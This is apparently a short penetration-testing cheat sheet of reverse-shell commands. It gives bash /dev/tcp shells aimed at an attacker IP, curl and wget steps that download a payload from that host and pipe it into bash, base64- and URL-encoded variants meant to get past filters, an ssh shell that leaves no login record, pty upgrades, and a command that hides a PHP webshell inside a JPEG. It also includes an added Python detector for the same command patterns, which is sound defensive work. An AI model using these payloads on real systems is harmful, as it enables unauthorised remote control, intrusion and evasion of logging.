Reverse shells
Common reverse shell methods (bash/curl/http) are listed below; for other reverse shell methods, see: Click Here
bash

    bash -i >& /dev/tcp/192.168.35.152/7777 0>&1

curl
Attacker:

    # bash.html holds the one-line payload
    cat bash.html
    /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1

Target host:

    curl 192.168.35.152/bash.html|bash

http
Attacker:
Write the shell script and start an HTTP server

    echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.sh
    # With python2:
    python -m SimpleHTTPServer 80
    # With python3:
    python -m http.server 80

Target host:

    # Transfer the shell.sh file
    wget 192.168.35.152/shell.sh
    # Run the shell.sh file
    bash shell.sh

java
java.lang.Runtime.exec() Payload: https://www.bugku.net/runtime-exec-payloads/

    # /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
    bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA==}|{base64,-d}|{bash,-i}'

URL-encode bypass:

    # /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
    bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA%3D%3D}|{base64,-d}|{bash,-i}'

ssh shell without a login record

    ssh -T root@1.1.1.1 /usr/bin/bash -i

python interactive shell

    python2 -c 'import pty;pty.spawn("/bin/sh")'
    python3 -c "import pty;pty.spawn('/bin/bash')"

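On the detection side, the command shapes listed above can be matched in process command-line logs. The following is an added example, not part of the original page: the rule names, the `classify`/`scan` helpers and the sample lines (using the 192.0.2.0/24 documentation range) are constructed for illustration, and it assumes command lines are already collected by process-execution logging.

```python
import base64
import re
from urllib.parse import quote, unquote

# Rule names are this example's own; patterns mirror the command shapes on this page.
RULES = [
    ("dev_tcp_redirect", re.compile(r"/dev/(tcp|udp)/[\w.\-]+/\d+")),
    ("download_pipe_shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")),
    ("pty_spawn", re.compile(r"pty\.spawn\(")),
    ("ssh_no_tty_shell", re.compile(r"\bssh\b.*\s-T\b.*\b(ba)?sh\s+-i\b")),
]
# {echo,<b64>}|{base64,-d}: brace-expansion wrapper; '%' allows URL-encoded padding.
BRACE_B64 = re.compile(r"\{echo,([A-Za-z0-9+/=%]+)\}\|\{base64,-d\}")


def classify(cmdline, depth=0):
    """Return the sorted rule names matching cmdline, looking inside base64 wrappers."""
    hits = {name for name, rx in RULES if rx.search(cmdline)}
    m = BRACE_B64.search(cmdline)
    if m and depth < 3:  # bound recursion on nested wrappers
        hits.add("brace_base64_wrapper")
        try:
            blob = base64.b64decode(unquote(m.group(1)), validate=True)
            hits.update(classify(blob.decode("utf-8", "replace"), depth + 1))
        except ValueError:  # not valid base64: keep the wrapper hit only
            pass
    return sorted(hits)


def scan(cmdlines):
    """Map each flagged command line to its rule names; clean lines are omitted."""
    return {c: h for c in cmdlines if (h := classify(c))}


# Constructed sample command lines (192.0.2.0/24 is a documentation range).
_INNER = "bash -i >& /dev/tcp/192.0.2.10/7777 0>&1"
_B64 = quote(base64.b64encode(_INNER.encode()).decode(), safe="")
SAMPLES = [
    _INNER,
    "curl 192.0.2.10/bash.html|bash",
    "bash -c {echo,%s}|{base64,-d}|{bash,-i}" % _B64,
    "python3 -c import pty;pty.spawn('/bin/bash')",
    "ssh -T root@192.0.2.20 /usr/bin/bash -i",
    "curl -s https://example.com/health -o /dev/null",
]

if __name__ == "__main__":
    for cmd, rules in scan(SAMPLES).items():
        print(rules, cmd)
```

Decoding the wrapper before matching is what lets the encoded and URL-encoded variants raise the same `dev_tcp_redirect` hit as the plain command.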
Creating an image webshell

    copy 1.jpg/b+1.php/a 2.jpg